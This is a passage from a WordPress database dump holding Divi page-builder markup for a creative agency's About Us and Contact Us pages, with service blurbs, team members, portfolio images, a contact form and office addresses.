custom_padding=\"56px||56px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"56px|0px|56px|0px|false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>With the advent to this digital era, <strong>Unique traffic to your website</strong>, is becoming the key battle point. Targeting the appropriate TG and reaching to them at the right place and the moment can help you earn them for lifetime.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||56px||false|false\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"4.5.2\" custom_padding=\"56px||56px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We do not fear trying new stuff and failure (we say learning). Meet the <span>team of professionals enjoying their work and adding value to your project.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\" hover_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Dhiraj Kumar\" position=\"Founder\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-6-1.jpg\" linkedin_url=\"https://www.linkedin.com/in/dhirajwth\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" hover_enabled=\"0\" alt=\"Dhiraj\" title_text=\"Founder WhatTheHell?\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Shubham Jha\" position=\"Marketing Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-2.jpg\" facebook_url=\"#\" linkedin_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" hover_enabled=\"0\" locked=\"off\" alt=\"Shubham\" title_text=\"Artboard (2)\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Sachin\" position=\"Art Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-7.jpg\" facebook_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" hover_enabled=\"0\" locked=\"off\" alt=\"Sachin\" title_text=\"Art Director WhatTheHell?\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"56px||56px|||\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" alt=\"Creative graphic designing \" title_text=\"Creative graphic designing \" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"56px||56px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\" _module_preset=\"default\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-08 20:58:07','2020-08-08 20:58:07','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/392-revision-v1/',0,'revision','',0),(740,1,'2020-08-10 09:49:59','2020-08-10 09:49:59','[et_pb_section fb_built=\"1\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>COntact US</h1>[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Section\" _builder_version=\"3.22\" custom_padding=\"50px||50px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" admin_label=\"Contact Area\" _builder_version=\"3.25\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"]<h4>Delhi</h4>\n<p>B-53/2, Naraina Vihar, New Delhi - 110028, India</p>\n<p>+91 9315666436</p>\n<p><a href=\"mailto:dhiraj@wthtest1.in8.cdn-alpha.com\">dhiraj@wthtest1.in8.cdn-alpha.com</a></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" locked=\"off\"]<h4>Bangalore</h4>\n<p>&nbsp;</p>\n<p><a href=\"mailto:bangalore@wthtest1.in8.cdn-alpha.com\">bangalore@wthtest1.in8.cdn-alpha.com</a></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" locked=\"off\"]<h4>Singapore</h4>\n<p>&nbsp;</p>\n<p><a 